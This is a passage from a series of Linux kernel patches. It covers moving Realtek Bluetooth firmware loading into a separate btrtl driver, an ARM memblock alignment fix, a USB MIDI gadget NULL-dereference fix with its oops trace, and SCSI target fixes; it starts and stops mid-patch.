+ skb = __hci_cmd_sync(hdev, 0xfc6d, 0, NULL, HCI_INIT_TIMEOUT); + if (IS_ERR(skb)) { + BT_ERR("%s: Read ROM version failed (%ld)", + hdev->name, PTR_ERR(skb)); + return PTR_ERR(skb); + } + + if (skb->len != sizeof(*rom_version)) { + BT_ERR("%s: RTL version event length mismatch", hdev->name); + kfree_skb(skb); + return -EIO; + } + + rom_version = (struct rtl_rom_version_evt *)skb->data; + BT_INFO("%s: rom_version status=%x version=%x", + hdev->name, rom_version->status, rom_version->version); + + *version = rom_version->version; + + kfree_skb(skb); + return 0; +} + +static int rtl8723b_parse_firmware(struct hci_dev *hdev, u16 lmp_subver, + const struct firmware *fw, + unsigned char **_buf) +{ + const u8 extension_sig[] = { 0x51, 0x04, 0xfd, 0x77 }; + struct rtl_epatch_header *epatch_info; + unsigned char *buf; + int i, ret, len; + size_t min_size; + u8 opcode, length, data, rom_version = 0; + int project_id = -1; + const unsigned char *fwptr, *chip_id_base; + const unsigned char *patch_length_base, *patch_offset_base; + u32 patch_offset = 0; + u16 patch_length, num_patches; + const u16 project_id_to_lmp_subver[] = { + RTL_ROM_LMP_8723A, + RTL_ROM_LMP_8723B, + RTL_ROM_LMP_8821A, + RTL_ROM_LMP_8761A + }; + + ret = rtl_read_rom_version(hdev, &rom_version); + if (ret) + return ret; + + min_size = sizeof(struct rtl_epatch_header) + sizeof(extension_sig) + 3; + if (fw->size < min_size) + return -EINVAL; + + fwptr = fw->data + fw->size - sizeof(extension_sig); + if (memcmp(fwptr, extension_sig, sizeof(extension_sig)) != 0) { + BT_ERR("%s: extension section signature mismatch", hdev->name); + return -EINVAL; + } + + /* Loop from the end of the firmware parsing instructions, until + * we find an instruction that identifies the "project ID" for the + * hardware supported by this firwmare file. + * Once we have that, we double-check that that project_id is suitable + * for the hardware we are working with. + */ + while (fwptr >= fw->data + (sizeof(struct rtl_epatch_header) + 3)) { + opcode = *--fwptr; + length = *--fwptr; + data = *--fwptr; + + BT_DBG("check op=%x len=%x data=%x", opcode, length, data); + + if (opcode == 0xff) /* EOF */ + break; + + if (length == 0) { + BT_ERR("%s: found instruction with length 0", + hdev->name); + return -EINVAL; + } + + if (opcode == 0 && length == 1) { + project_id = data; + break; + } + + fwptr -= length; + } + + if (project_id < 0) { + BT_ERR("%s: failed to find version instruction", hdev->name); + return -EINVAL; + } + + if (project_id >= ARRAY_SIZE(project_id_to_lmp_subver)) { + BT_ERR("%s: unknown project id %d", hdev->name, project_id); + return -EINVAL; + } + + if (lmp_subver != project_id_to_lmp_subver[project_id]) { + BT_ERR("%s: firmware is for %x but this is a %x", hdev->name, + project_id_to_lmp_subver[project_id], lmp_subver); + return -EINVAL; + } + + epatch_info = (struct rtl_epatch_header *)fw->data; + if (memcmp(epatch_info->signature, RTL_EPATCH_SIGNATURE, 8) != 0) { + BT_ERR("%s: bad EPATCH signature", hdev->name); + return -EINVAL; + } + + num_patches = le16_to_cpu(epatch_info->num_patches); + BT_DBG("fw_version=%x, num_patches=%d", + le32_to_cpu(epatch_info->fw_version), num_patches); + + /* After the rtl_epatch_header there is a funky patch metadata section. + * Assuming 2 patches, the layout is: + * ChipID1 ChipID2 PatchLength1 PatchLength2 PatchOffset1 PatchOffset2 + * + * Find the right patch for this chip. + */ + min_size += 8 * num_patches; + if (fw->size < min_size) + return -EINVAL; + + chip_id_base = fw->data + sizeof(struct rtl_epatch_header); + patch_length_base = chip_id_base + (sizeof(u16) * num_patches); + patch_offset_base = patch_length_base + (sizeof(u16) * num_patches); + for (i = 0; i < num_patches; i++) { + u16 chip_id = get_unaligned_le16(chip_id_base + + (i * sizeof(u16))); + if (chip_id == rom_version + 1) { + patch_length = get_unaligned_le16(patch_length_base + + (i * sizeof(u16))); + patch_offset = get_unaligned_le32(patch_offset_base + + (i * sizeof(u32))); + break; + } + } + + if (!patch_offset) { + BT_ERR("%s: didn't find patch for chip id %d", + hdev->name, rom_version); + return -EINVAL; + } + + BT_DBG("length=%x offset=%x index %d", patch_length, patch_offset, i); + min_size = patch_offset + patch_length; + if (fw->size < min_size) + return -EINVAL; + + /* Copy the firmware into a new buffer and write the version at + * the end. + */ + len = patch_length; + buf = kmemdup(fw->data + patch_offset, patch_length, GFP_KERNEL); + if (!buf) + return -ENOMEM; + + memcpy(buf + patch_length - 4, &epatch_info->fw_version, 4); + + *_buf = buf; + return len; +} + +static int rtl_download_firmware(struct hci_dev *hdev, + const unsigned char *data, int fw_len) +{ + struct rtl_download_cmd *dl_cmd; + int frag_num = fw_len / RTL_FRAG_LEN + 1; + int frag_len = RTL_FRAG_LEN; + int ret = 0; + int i; + + dl_cmd = kmalloc(sizeof(struct rtl_download_cmd), GFP_KERNEL); + if (!dl_cmd) + return -ENOMEM; + + for (i = 0; i < frag_num; i++) { + struct sk_buff *skb; + + BT_DBG("download fw (%d/%d)", i, frag_num); + + dl_cmd->index = i; + if (i == (frag_num - 1)) { + dl_cmd->index |= 0x80; /* data end */ + frag_len = fw_len % RTL_FRAG_LEN; + } + memcpy(dl_cmd->data, data, frag_len); + + /* Send download command */ + skb = __hci_cmd_sync(hdev, 0xfc20, frag_len + 1, dl_cmd, + HCI_INIT_TIMEOUT); + if (IS_ERR(skb)) { + BT_ERR("%s: download fw command failed (%ld)", + hdev->name, PTR_ERR(skb)); + ret = -PTR_ERR(skb); + goto out; + } + + if (skb->len != sizeof(struct rtl_download_response)) { + BT_ERR("%s: download fw event length mismatch", + hdev->name); + kfree_skb(skb); + ret = -EIO; + goto out; + } + + kfree_skb(skb); + data += RTL_FRAG_LEN; + } + +out: + kfree(dl_cmd); + return ret; +} + +static int btrtl_setup_rtl8723a(struct hci_dev *hdev) +{ + const struct firmware *fw; + int ret; + + BT_INFO("%s: rtl: loading rtl_bt/rtl8723a_fw.bin", hdev->name); + ret = request_firmware(&fw, "rtl_bt/rtl8723a_fw.bin", &hdev->dev); + if (ret < 0) { + BT_ERR("%s: Failed to load rtl_bt/rtl8723a_fw.bin", hdev->name); + return ret; + } + + if (fw->size < 8) { + ret = -EINVAL; + goto out; + } + + /* Check that the firmware doesn't have the epatch signature + * (which is only for RTL8723B and newer). + */ + if (!memcmp(fw->data, RTL_EPATCH_SIGNATURE, 8)) { + BT_ERR("%s: unexpected EPATCH signature!", hdev->name); + ret = -EINVAL; + goto out; + } + + ret = rtl_download_firmware(hdev, fw->data, fw->size); + +out: + release_firmware(fw); + return ret; +} + +static int btrtl_setup_rtl8723b(struct hci_dev *hdev, u16 lmp_subver, + const char *fw_name) +{ + unsigned char *fw_data = NULL; + const struct firmware *fw; + int ret; + + BT_INFO("%s: rtl: loading %s", hdev->name, fw_name); + ret = request_firmware(&fw, fw_name, &hdev->dev); + if (ret < 0) { + BT_ERR("%s: Failed to load %s", hdev->name, fw_name); + return ret; + } + + ret = rtl8723b_parse_firmware(hdev, lmp_subver, fw, &fw_data); + if (ret < 0) + goto out; + + ret = rtl_download_firmware(hdev, fw_data, ret); + kfree(fw_data); + if (ret < 0) + goto out; + +out: + release_firmware(fw); + return ret; +} + +static struct sk_buff *btrtl_read_local_version(struct hci_dev *hdev) +{ + struct sk_buff *skb; + + skb = __hci_cmd_sync(hdev, HCI_OP_READ_LOCAL_VERSION, 0, NULL, + HCI_INIT_TIMEOUT); + if (IS_ERR(skb)) { + BT_ERR("%s: HCI_OP_READ_LOCAL_VERSION failed (%ld)", + hdev->name, PTR_ERR(skb)); + return skb; + } + + if (skb->len != sizeof(struct hci_rp_read_local_version)) { + BT_ERR("%s: HCI_OP_READ_LOCAL_VERSION event length mismatch", + hdev->name); + kfree_skb(skb); + return ERR_PTR(-EIO); + } + + return skb; +} + +int btrtl_setup_realtek(struct hci_dev *hdev) +{ + struct sk_buff *skb; + struct hci_rp_read_local_version *resp; + u16 lmp_subver; + + skb = btrtl_read_local_version(hdev); + if (IS_ERR(skb)) + return -PTR_ERR(skb); + + resp = (struct hci_rp_read_local_version *)skb->data; + BT_INFO("%s: rtl: examining hci_ver=%02x hci_rev=%04x lmp_ver=%02x " + "lmp_subver=%04x", hdev->name, resp->hci_ver, resp->hci_rev, + resp->lmp_ver, resp->lmp_subver); + + lmp_subver = le16_to_cpu(resp->lmp_subver); + kfree_skb(skb); + + /* Match a set of subver values that correspond to stock firmware, + * which is not compatible with standard btusb. + * If matched, upload an alternative firmware that does conform to + * standard btusb. Once that firmware is uploaded, the subver changes + * to a different value. + */ + switch (lmp_subver) { + case RTL_ROM_LMP_8723A: + case RTL_ROM_LMP_3499: + return btrtl_setup_rtl8723a(hdev); + case RTL_ROM_LMP_8723B: + return btrtl_setup_rtl8723b(hdev, lmp_subver, + "rtl_bt/rtl8723b_fw.bin"); + case RTL_ROM_LMP_8821A: + return btrtl_setup_rtl8723b(hdev, lmp_subver, + "rtl_bt/rtl8821a_fw.bin"); + case RTL_ROM_LMP_8761A: + return btrtl_setup_rtl8723b(hdev, lmp_subver, + "rtl_bt/rtl8761a_fw.bin"); + default: + BT_INFO("rtl: assuming no firmware upload needed."); + return 0; + } +} +EXPORT_SYMBOL_GPL(btrtl_setup_realtek); + +MODULE_AUTHOR("Daniel Drake "); +MODULE_DESCRIPTION("Bluetooth support for Realtek devices ver " VERSION); +MODULE_VERSION(VERSION); +MODULE_LICENSE("GPL"); diff --git a/drivers/bluetooth/btrtl.h b/drivers/bluetooth/btrtl.h new file mode 100644 index 000000000000..38ffe4890cd1 --- /dev/null +++ b/drivers/bluetooth/btrtl.h @@ -0,0 +1,52 @@ +/* + * Bluetooth support for Realtek devices + * + * Copyright (C) 2015 Endless Mobile, Inc. + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by + * the Free Software Foundation; either version 2 of the License, or + * (at your option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + */ + +#define RTL_FRAG_LEN 252 + +struct rtl_download_cmd { + __u8 index; + __u8 data[RTL_FRAG_LEN]; +} __packed; + +struct rtl_download_response { + __u8 status; + __u8 index; +} __packed; + +struct rtl_rom_version_evt { + __u8 status; + __u8 version; +} __packed; + +struct rtl_epatch_header { + __u8 signature[8]; + __le32 fw_version; + __le16 num_patches; +} __packed; + +#if IS_ENABLED(CONFIG_BT_RTL) + +int btrtl_setup_realtek(struct hci_dev *hdev); + +#else + +static inline int btrtl_setup_realtek(struct hci_dev *hdev) +{ + return -EOPNOTSUPP; +} + +#endif diff --git a/drivers/bluetooth/btusb.c b/drivers/bluetooth/btusb.c index d21f3b4176d3..df87016d18ab 100644 --- a/drivers/bluetooth/btusb.c +++ b/drivers/bluetooth/btusb.c @@ -31,6 +31,7 @@ #include "btintel.h" #include "btbcm.h" +#include "btrtl.h" #define VERSION "0.8" @@ -1369,378 +1370,6 @@ static int btusb_setup_csr(struct hci_dev *hdev) return ret; } -#define RTL_FRAG_LEN 252 - -struct rtl_download_cmd { - __u8 index; - __u8 data[RTL_FRAG_LEN]; -} __packed; - -struct rtl_download_response { - __u8 status; - __u8 index; -} __packed; - -struct rtl_rom_version_evt { - __u8 status; - __u8 version; -} __packed; - -struct rtl_epatch_header { - __u8 signature[8]; - __le32 fw_version; - __le16 num_patches; -} __packed; - -#define RTL_EPATCH_SIGNATURE "Realtech" -#define RTL_ROM_LMP_3499 0x3499 -#define RTL_ROM_LMP_8723A 0x1200 -#define RTL_ROM_LMP_8723B 0x8723 -#define RTL_ROM_LMP_8821A 0x8821 -#define RTL_ROM_LMP_8761A 0x8761 - -static int rtl_read_rom_version(struct hci_dev *hdev, u8 *version) -{ - struct rtl_rom_version_evt *rom_version; - struct sk_buff *skb; - int ret; - - /* Read RTL ROM version command */ - skb = __hci_cmd_sync(hdev, 0xfc6d, 0, NULL, HCI_INIT_TIMEOUT); - if (IS_ERR(skb)) { - BT_ERR("%s: Read ROM version failed (%ld)", - hdev->name, PTR_ERR(skb)); - return PTR_ERR(skb); - } - - if (skb->len != sizeof(*rom_version)) { - BT_ERR("%s: RTL version event length mismatch", hdev->name); - kfree_skb(skb); - return -EIO; - } - - rom_version = (struct rtl_rom_version_evt *)skb->data; - BT_INFO("%s: rom_version status=%x version=%x", - hdev->name, rom_version->status, rom_version->version); - - ret = rom_version->status; - if (ret == 0) - *version = rom_version->version; - - kfree_skb(skb); - return ret; -} - -static int rtl8723b_parse_firmware(struct hci_dev *hdev, u16 lmp_subver, - const struct firmware *fw, - unsigned char **_buf) -{ - const u8 extension_sig[] = { 0x51, 0x04, 0xfd, 0x77 }; - struct rtl_epatch_header *epatch_info; - unsigned char *buf; - int i, ret, len; - size_t min_size; - u8 opcode, length, data, rom_version = 0; - int project_id = -1; - const unsigned char *fwptr, *chip_id_base; - const unsigned char *patch_length_base, *patch_offset_base; - u32 patch_offset = 0; - u16 patch_length, num_patches; - const u16 project_id_to_lmp_subver[] = { - RTL_ROM_LMP_8723A, - RTL_ROM_LMP_8723B, - RTL_ROM_LMP_8821A, - RTL_ROM_LMP_8761A - }; - - ret = rtl_read_rom_version(hdev, &rom_version); - if (ret) - return -bt_to_errno(ret); - - min_size = sizeof(struct rtl_epatch_header) + sizeof(extension_sig) + 3; - if (fw->size < min_size) - return -EINVAL; - - fwptr = fw->data + fw->size - sizeof(extension_sig); - if (memcmp(fwptr, extension_sig, sizeof(extension_sig)) != 0) { - BT_ERR("%s: extension section signature mismatch", hdev->name); - return -EINVAL; - } - - /* Loop from the end of the firmware parsing instructions, until - * we find an instruction that identifies the "project ID" for the - * hardware supported by this firwmare file. - * Once we have that, we double-check that that project_id is suitable - * for the hardware we are working with. - */ - while (fwptr >= fw->data + (sizeof(struct rtl_epatch_header) + 3)) { - opcode = *--fwptr; - length = *--fwptr; - data = *--fwptr; - - BT_DBG("check op=%x len=%x data=%x", opcode, length, data); - - if (opcode == 0xff) /* EOF */ - break; - - if (length == 0) { - BT_ERR("%s: found instruction with length 0", - hdev->name); - return -EINVAL; - } - - if (opcode == 0 && length == 1) { - project_id = data; - break; - } - - fwptr -= length; - } - - if (project_id < 0) { - BT_ERR("%s: failed to find version instruction", hdev->name); - return -EINVAL; - } - - if (project_id >= ARRAY_SIZE(project_id_to_lmp_subver)) { - BT_ERR("%s: unknown project id %d", hdev->name, project_id); - return -EINVAL; - } - - if (lmp_subver != project_id_to_lmp_subver[project_id]) { - BT_ERR("%s: firmware is for %x but this is a %x", hdev->name, - project_id_to_lmp_subver[project_id], lmp_subver); - return -EINVAL; - } - - epatch_info = (struct rtl_epatch_header *)fw->data; - if (memcmp(epatch_info->signature, RTL_EPATCH_SIGNATURE, 8) != 0) { - BT_ERR("%s: bad EPATCH signature", hdev->name); - return -EINVAL; - } - - num_patches = le16_to_cpu(epatch_info->num_patches); - BT_DBG("fw_version=%x, num_patches=%d", - le32_to_cpu(epatch_info->fw_version), num_patches); - - /* After the rtl_epatch_header there is a funky patch metadata section. - * Assuming 2 patches, the layout is: - * ChipID1 ChipID2 PatchLength1 PatchLength2 PatchOffset1 PatchOffset2 - * - * Find the right patch for this chip. - */ - min_size += 8 * num_patches; - if (fw->size < min_size) - return -EINVAL; - - chip_id_base = fw->data + sizeof(struct rtl_epatch_header); - patch_length_base = chip_id_base + (sizeof(u16) * num_patches); - patch_offset_base = patch_length_base + (sizeof(u16) * num_patches); - for (i = 0; i < num_patches; i++) { - u16 chip_id = get_unaligned_le16(chip_id_base + - (i * sizeof(u16))); - if (chip_id == rom_version + 1) { - patch_length = get_unaligned_le16(patch_length_base + - (i * sizeof(u16))); - patch_offset = get_unaligned_le32(patch_offset_base + - (i * sizeof(u32))); - break; - } - } - - if (!patch_offset) { - BT_ERR("%s: didn't find patch for chip id %d", - hdev->name, rom_version); - return -EINVAL; - } - - BT_DBG("length=%x offset=%x index %d", patch_length, patch_offset, i); - min_size = patch_offset + patch_length; - if (fw->size < min_size) - return -EINVAL; - - /* Copy the firmware into a new buffer and write the version at - * the end. - */ - len = patch_length; - buf = kmemdup(fw->data + patch_offset, patch_length, GFP_KERNEL); - if (!buf) - return -ENOMEM; - - memcpy(buf + patch_length - 4, &epatch_info->fw_version, 4); - - *_buf = buf; - return len; -} - -static int rtl_download_firmware(struct hci_dev *hdev, - const unsigned char *data, int fw_len) -{ - struct rtl_download_cmd *dl_cmd; - int frag_num = fw_len / RTL_FRAG_LEN + 1; - int frag_len = RTL_FRAG_LEN; - int ret = 0; - int i; - - dl_cmd = kmalloc(sizeof(struct rtl_download_cmd), GFP_KERNEL); - if (!dl_cmd) - return -ENOMEM; - - for (i = 0; i < frag_num; i++) { - struct rtl_download_response *dl_resp; - struct sk_buff *skb; - - BT_DBG("download fw (%d/%d)", i, frag_num); - - dl_cmd->index = i; - if (i == (frag_num - 1)) { - dl_cmd->index |= 0x80; /* data end */ - frag_len = fw_len % RTL_FRAG_LEN; - } - memcpy(dl_cmd->data, data, frag_len); - - /* Send download command */ - skb = __hci_cmd_sync(hdev, 0xfc20, frag_len + 1, dl_cmd, - HCI_INIT_TIMEOUT); - if (IS_ERR(skb)) { - BT_ERR("%s: download fw command failed (%ld)", - hdev->name, PTR_ERR(skb)); - ret = -PTR_ERR(skb); - goto out; - } - - if (skb->len != sizeof(*dl_resp)) { - BT_ERR("%s: download fw event length mismatch", - hdev->name); - kfree_skb(skb); - ret = -EIO; - goto out; - } - - dl_resp = (struct rtl_download_response *)skb->data; - if (dl_resp->status != 0) { - kfree_skb(skb); - ret = bt_to_errno(dl_resp->status); - goto out; - } - - kfree_skb(skb); - data += RTL_FRAG_LEN; - } - -out: - kfree(dl_cmd); - return ret; -} - -static int btusb_setup_rtl8723a(struct hci_dev *hdev) -{ - struct btusb_data *data = dev_get_drvdata(&hdev->dev); - struct usb_device *udev = interface_to_usbdev(data->intf); - const struct firmware *fw; - int ret; - - BT_INFO("%s: rtl: loading rtl_bt/rtl8723a_fw.bin", hdev->name); - ret = request_firmware(&fw, "rtl_bt/rtl8723a_fw.bin", &udev->dev); - if (ret < 0) { - BT_ERR("%s: Failed to load rtl_bt/rtl8723a_fw.bin", hdev->name); - return ret; - } - - if (fw->size < 8) { - ret = -EINVAL; - goto out; - } - - /* Check that the firmware doesn't have the epatch signature - * (which is only for RTL8723B and newer). - */ - if (!memcmp(fw->data, RTL_EPATCH_SIGNATURE, 8)) { - BT_ERR("%s: unexpected EPATCH signature!", hdev->name); - ret = -EINVAL; - goto out; - } - - ret = rtl_download_firmware(hdev, fw->data, fw->size); - -out: - release_firmware(fw); - return ret; -} - -static int btusb_setup_rtl8723b(struct hci_dev *hdev, u16 lmp_subver, - const char *fw_name) -{ - struct btusb_data *data = dev_get_drvdata(&hdev->dev); - struct usb_device *udev = interface_to_usbdev(data->intf); - unsigned char *fw_data = NULL; - const struct firmware *fw; - int ret; - - BT_INFO("%s: rtl: loading %s", hdev->name, fw_name); - ret = request_firmware(&fw, fw_name, &udev->dev); - if (ret < 0) { - BT_ERR("%s: Failed to load %s", hdev->name, fw_name); - return ret; - } - - ret = rtl8723b_parse_firmware(hdev, lmp_subver, fw, &fw_data); - if (ret < 0) - goto out; - - ret = rtl_download_firmware(hdev, fw_data, ret); - kfree(fw_data); - if (ret < 0) - goto out; - -out: - release_firmware(fw); - return ret; -} - -static int btusb_setup_realtek(struct hci_dev *hdev) -{ - struct sk_buff *skb; - struct hci_rp_read_local_version *resp; - u16 lmp_subver; - - skb = btusb_read_local_version(hdev); - if (IS_ERR(skb)) - return -PTR_ERR(skb); - - resp = (struct hci_rp_read_local_version *)skb->data; - BT_INFO("%s: rtl: examining hci_ver=%02x hci_rev=%04x lmp_ver=%02x " - "lmp_subver=%04x", hdev->name, resp->hci_ver, resp->hci_rev, - resp->lmp_ver, resp->lmp_subver); - - lmp_subver = le16_to_cpu(resp->lmp_subver); - kfree_skb(skb); - - /* Match a set of subver values that correspond to stock firmware, - * which is not compatible with standard btusb. - * If matched, upload an alternative firmware that does conform to - * standard btusb. Once that firmware is uploaded, the subver changes - * to a different value. - */ - switch (lmp_subver) { - case RTL_ROM_LMP_8723A: - case RTL_ROM_LMP_3499: - return btusb_setup_rtl8723a(hdev); - case RTL_ROM_LMP_8723B: - return btusb_setup_rtl8723b(hdev, lmp_subver, - "rtl_bt/rtl8723b_fw.bin"); - case RTL_ROM_LMP_8821A: - return btusb_setup_rtl8723b(hdev, lmp_subver, - "rtl_bt/rtl8821a_fw.bin"); - case RTL_ROM_LMP_8761A: - return btusb_setup_rtl8723b(hdev, lmp_subver, - "rtl_bt/rtl8761a_fw.bin"); - default: - BT_INFO("rtl: assuming no firmware upload needed."); - return 0; - } -} - static const struct firmware *btusb_setup_intel_get_fw(struct hci_dev *hdev, struct intel_version *ver) { @@ -3172,8 +2801,10 @@ static int btusb_probe(struct usb_interface *intf, hdev->set_bdaddr = btusb_set_bdaddr_ath3012; } +#ifdef CONFIG_BT_HCIBTUSB_RTL if (id->driver_info & BTUSB_REALTEK) - hdev->setup = btusb_setup_realtek; + hdev->setup = btrtl_setup_realtek; +#endif if (id->driver_info & BTUSB_AMP) { /* AMP controllers do not support SCO packets */ From 965278dcb8ab0b1f666cc47937933c4be4aea48d Mon Sep 17 00:00:00 2001 From: Mark Rutland Date: Wed, 13 May 2015 15:07:54 +0100 Subject: [PATCH 051/872] ARM: 8356/1: mm: handle non-pmd-aligned end of RAM At boot time we round the memblock limit down to section size in an attempt to ensure that we will have mapped this RAM with section mappings prior to allocating from it. When mapping RAM we iterate over PMD-sized chunks, creating these section mappings. Section mappings are only created when the end of a chunk is aligned to section size. Unfortunately, with classic page tables (where PMD_SIZE is 2 * SECTION_SIZE) this means that if a chunk is between 1M and 2M in size the first 1M will not be mapped despite having been accounted for in the memblock limit. This has been observed to result in page tables being allocated from unmapped memory, causing boot-time hangs. This patch modifies the memblock limit rounding to always round down to PMD_SIZE instead of SECTION_SIZE. For classic MMU this means that we will round the memblock limit down to a 2M boundary, matching the limits on section mappings, and preventing allocations from unmapped memory. For LPAE there should be no change as PMD_SIZE == SECTION_SIZE. Signed-off-by: Mark Rutland Reported-by: Stefan Agner Tested-by: Stefan Agner Acked-by: Laura Abbott Tested-by: Hans de Goede Cc: Catalin Marinas Cc: Steve Capper Cc: stable@vger.kernel.org Signed-off-by: Russell King --- arch/arm/mm/mmu.c | 20 ++++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/arch/arm/mm/mmu.c b/arch/arm/mm/mmu.c index 4e6ef896c619..7186382672b5 100644 --- a/arch/arm/mm/mmu.c +++ b/arch/arm/mm/mmu.c @@ -1112,22 +1112,22 @@ void __init sanity_check_meminfo(void) } /* - * Find the first non-section-aligned page, and point + * Find the first non-pmd-aligned page, and point * memblock_limit at it. This relies on rounding the - * limit down to be section-aligned, which happens at - * the end of this function. + * limit down to be pmd-aligned, which happens at the + * end of this function. * * With this algorithm, the start or end of almost any - * bank can be non-section-aligned. The only exception - * is that the start of the bank 0 must be section- + * bank can be non-pmd-aligned. The only exception is + * that the start of the bank 0 must be section- * aligned, since otherwise memory would need to be * allocated when mapping the start of bank 0, which * occurs before any free memory is mapped. */ if (!memblock_limit) { - if (!IS_ALIGNED(block_start, SECTION_SIZE)) + if (!IS_ALIGNED(block_start, PMD_SIZE)) memblock_limit = block_start; - else if (!IS_ALIGNED(block_end, SECTION_SIZE)) + else if (!IS_ALIGNED(block_end, PMD_SIZE)) memblock_limit = arm_lowmem_limit; } @@ -1137,12 +1137,12 @@ void __init sanity_check_meminfo(void) high_memory = __va(arm_lowmem_limit - 1) + 1; /* - * Round the memblock limit down to a section size. This + * Round the memblock limit down to a pmd size. This * helps to ensure that we will allocate memory from the - * last full section, which should be mapped. + * last full pmd, which should be mapped. */ if (memblock_limit) - memblock_limit = round_down(memblock_limit, SECTION_SIZE); + memblock_limit = round_down(memblock_limit, PMD_SIZE); if (!memblock_limit) memblock_limit = arm_lowmem_limit; From a25a23cc85a28090bf8ab0e750b48e7ab283ba8a Mon Sep 17 00:00:00 2001 From: Pawel Szewczyk Date: Thu, 14 May 2015 14:14:11 +0200 Subject: [PATCH 052/872] usb: gadget: f_midi: fix segfault when reading empty id When midi function is created, 'id' attribute is initialized with SNDRV_DEFAULT_STR1, which is NULL pointer. Trying to read this attribute before filling it ends up with segmentation fault. This commit fix this issue by preventing null pointer dereference. Now f_midi_opts_id_show() returns empty string when id is a null pointer. Reproduction path: $ mkdir functions/midi.0 $ cat functions/midi.0/id [ 53.130132] Unable to handle kernel NULL pointer dereference at virtual address 00000000 [ 53.132630] pgd = ec6cc000 [ 53.135308] [00000000] *pgd=6b759831, *pte=00000000, *ppte=00000000 [ 53.141530] Internal error: Oops: 17 [#1] PREEMPT SMP ARM [ 53.146904] Modules linked in: usb_f_midi snd_rawmidi libcomposite [ 53.153071] CPU: 1 PID: 2936 Comm: cat Not tainted 3.19.0-00041-gcf4b216 #7 [ 53.160010] Hardware name: SAMSUNG EXYNOS (Flattened Device Tree) [ 53.166088] task: ee234c80 ti: ec764000 task.ti: ec764000 [ 53.171482] PC is at strlcpy+0x8/0x60 [ 53.175128] LR is at f_midi_opts_id_show+0x28/0x3c [usb_f_midi] [ 53.181019] pc : [] lr : [] psr: 60000053 [ 53.181019] sp : ec765ef8 ip : 00000141 fp : 00000000 [ 53.192474] r10: 00019000 r9 : ed7546c0 r8 : 00010000 [ 53.197682] r7 : ec765f80 r6 : eb46a000 r5 : eb46a000 r4 : ed754734 [ 53.204192] r3 : ee234c80 r2 : 00001000 r1 : 00000000 r0 : eb46a000 [ 53.210704] Flags: nZCv IRQs on FIQs off Mode SVC_32 ISA ARM Segment user [ 53.217907] Control: 10c5387d Table: 6c6cc04a DAC: 00000015 [ 53.223636] Process cat (pid: 2936, stack limit = 0xec764238) [ 53.229364] Stack: (0xec765ef8 to 0xec766000) [ 53.233706] 5ee0: ed754734 ed7546c0 [ 53.241866] 5f00: eb46a000 bf01bed0 eb753b80 bf01cc44 eb753b98 bf01b0a4 bf01b08c c0125dd0 [ 53.250025] 5f20: 00002f19 00000000 ec432e00 bf01cce8 c0530c00 00019000 00010000 ec765f80 [ 53.258184] 5f40: 00010000 ec764000 00019000 c00cc4ac ec432e00 c00cc55c 00000017 000081a4 [ 53.266343] 5f60: 00000001 00000000 00000000 ec432e00 ec432e00 00010000 00019000 c00cc620 [ 53.274502] 5f80: 00000000 00000000 00000000 00010000 ffff1000 00019000 00000003 c000e9a8 [ 53.282662] 5fa0: 00000000 c000e7e0 00010000 ffff1000 00000003 00019000 00010000 00019000 [ 53.290821] 5fc0: 00010000 ffff1000 00019000 00000003 7fffe000 00000001 00000000 00000000 [ 53.298980] 5fe0: 00000000 be8c68d4 0000b995 b6f0e3e6 40000070 00000003 00000000 00000000 [ 53.307157] [] (strlcpy) from [] (f_midi_opts_id_show+0x28/0x3c [usb_f_midi]) [ 53.316006] [] (f_midi_opts_id_show [usb_f_midi]) from [] (f_midi_opts_attr_show+0x18/0x24 ) [ 53.327209] [] (f_midi_opts_attr_show [usb_f_midi]) from [] (configfs_read_file+0x9c/0xec) [ 53.337180] [] (configfs_read_file) from [] (__vfs_read+0x18/0x4c) [ 53.345073] [] (__vfs_read) from [] (vfs_read+0x7c/0x100) [ 53.352190] [] (vfs_read) from [] (SyS_read+0x40/0x8c) [ 53.359056] [] (SyS_read) from [] (ret_fast_syscall+0x0/0x34) [ 53.366513] Code: ebffe3d3 e8bd8008 e92d4070 e1a05000 (e5d14000) [ 53.372641] ---[ end trace e4f53a4e233d98d0 ]--- Signed-off-by: Pawel Szewczyk Signed-off-by: Felipe Balbi --- drivers/usb/gadget/function/f_midi.c | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/drivers/usb/gadget/function/f_midi.c b/drivers/usb/gadget/function/f_midi.c index 259b656c0b3e..6316aa5b1c49 100644 --- a/drivers/usb/gadget/function/f_midi.c +++ b/drivers/usb/gadget/function/f_midi.c @@ -973,7 +973,13 @@ static ssize_t f_midi_opts_id_show(struct f_midi_opts *opts, char *page) int result; mutex_lock(&opts->lock); - result = strlcpy(page, opts->id, PAGE_SIZE); + if (opts->id) { + result = strlcpy(page, opts->id, PAGE_SIZE); + } else { + page[0] = 0; + result = 0; + } + mutex_unlock(&opts->lock); return result; From 63509c60bbc62120fb0e3b287c86ac036b893d90 Mon Sep 17 00:00:00 2001 From: Bart Van Assche Date: Wed, 13 May 2015 09:17:54 +0200 Subject: [PATCH 053/872] target: Fix bidi command handling The function transport_complete_qf() must call either queue_data_in() or queue_status() but not both. Signed-off-by: Bart Van Assche Reviewed-by: Christoph Hellwig Signed-off-by: Nicholas Bellinger --- drivers/target/target_core_transport.c | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/drivers/target/target_core_transport.c b/drivers/target/target_core_transport.c index 3fe5cb240b6f..99a38cf320ff 100644 --- a/drivers/target/target_core_transport.c +++ b/drivers/target/target_core_transport.c @@ -1957,8 +1957,7 @@ static void transport_complete_qf(struct se_cmd *cmd) case DMA_TO_DEVICE: if (cmd->se_cmd_flags & SCF_BIDI) { ret = cmd->se_tfo->queue_data_in(cmd); - if (ret < 0) - break; + break; } /* Fall through for DMA_TO_DEVICE */ case DMA_NONE: From 6c2faeaa0ecc67098106771cba8b7ed1e99a1b5f Mon Sep 17 00:00:00 2001 From: Bart Van Assche Date: Wed, 13 May 2015 09:19:02 +0200 Subject: [PATCH 054/872] target: Add missing parentheses Code like " &= ~CMD_T_BUSY | ..." only clears CMD_T_BUSY but not the other flag. Modify these statements such that both flags are cleared. (Fix fuzz for target_write_prot_action code in mainline - nab) Signed-off-by: Bart Van Assche Reviewed-by: Christoph Hellwig Signed-off-by: Nicholas Bellinger --- 